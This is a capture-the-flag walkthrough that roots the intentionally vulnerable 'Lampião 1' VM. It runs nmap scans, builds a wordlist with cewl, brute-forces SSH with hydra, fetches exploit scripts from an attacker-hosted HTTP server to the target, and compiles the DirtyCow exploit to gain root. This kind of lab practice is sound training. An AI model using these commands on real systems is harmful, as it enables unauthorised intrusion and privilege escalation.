Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lampião 1”. Get root! This was a great machine as I learnt about a new linux vulnerability DirtyCow. Based on my experience, getting the first foothold was easy but escalating the user rights was slightly more tricky as it involved testing out a few different CVEs. Some research helped me identify which one to use, at the end of the day it’s experience with privsec which helps the most.
Author: Tiago Tavares
Set up the Machine with a host-only adapter and run an nmap command to discover all the hosts on the local host-only network. My interface eth1 is Host-Only on my main OS (Kali Linux).
nmap -sn 192.168.54.1/24
We can identify the machine with the IP 192.168.54.6, so we will scan it for open ports with nmap to a file named “nmap” with the following command:
nmap -sS -p- -A -o "nmap" 192.168.54.6
We see port 80 open so let’s visit this port with our browser. This is the webpage:
There doesn’t seem to be much, I visit port 1898 on my web browser:
According to the nmap results, there were quite a few entries in the robots.txt. I’ll run a dirb scan just to find all the paths:
First, I’ll visit the robots.txt:
The above is a snippet of just the disallowed entries. I first visited the changelog.txt path:
We can identify a service and version number:
This is worth noting in case we need to find any vulnerabilities.
I also wanted to note the potential username “tiago” I found on one of the posts:
The URL was worth investigating as well. I tried manually navigating to another post using the URL. I changed ?q=node/1 to ?q=node/2:
Another possible user named “Eder” as highlighted in the above screenshot. There is also node 3 but no new information.
I couldn’t find much more information on the web pages of this machine so I decided to go straight to brute forcing. There are 2 possible entry points: SSH (identified from our port scan) and the web site login (no admin login page found).
Let’s try brute forcing the SSH login - create a wordlist of the 2 usernames found:
I will use the following hydra command:
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 192.168.54.6 -t 4 ssh
-L specified a username wordlist, -P specifies the password wordlist and -t 4 threads.
The hydra command took too long so I wanted to make my wordlist, especially as this seems to be a Portuguese web server. The post @ ?q=node/1 had a lot of words so I want to use a tool called Cewl to crawl this web page and create a wordlist which I can use for my brute-force. Here is the following command:
cewl http://192.168.54.6:1898/?q=node/1 --write passwords.txt
This is the first few lines of the wordlist we have just created:
Let’s execute the hydra command again but with this new password list:
hydra -L users.txt -P passwords.txt 192.168.54.6 -t 4 ssh
We have some credentials returned = tiago:Virgulino
Let’s use this to connect via SSH:
ssh [email protected] Virgulino
We have successfully logged in as uid tiago. Nice :)
For this machine, I will be using a script to identify any vulnerabilities on the system. This is a good script I recommend for Linux machines:
Let’s download this onto our local machine first:
Create a HTTP server so we can transfer this onto our victims machine:
python -m SimpleHTTPServer 8080
Now let’s transfer the files into the victims /tmp directory on our ssh shell:
cd /tmp wget http://192.168.54.4:8080/linux-exploit-suggester.sh
Make this an executable and execute it.
chmod +x linux-exploit-suggester.sh ./linux-exploit-suggester.sh
The output will be a list of possible exploits, I will be using this one in particular:
This is called dirtycow because of the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings.
It says the download link however it is no longer stored here. Use this website for the script:
As we have done before, download this script onto your local machine and create a simple HTTP server:
wget https://www.exploit-db.com/raw/40847 40847.cpp python -m SimpleHTTPServer 8080
Now transfer this file onto the /tmp directory of the victims PC:
wget http://192.168.54.4:8080/40847 mv 40847 40847.cpp
Now that we have our script 40847.cpp ready, let’s compile the file:
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
We now need to execute “dcow”:
We have been told the root password has been changed to: dirtyCowFun. Let’s change to root:
su root dirtyCowFun
We are now logged in as root!
id cd /root cat flag.txt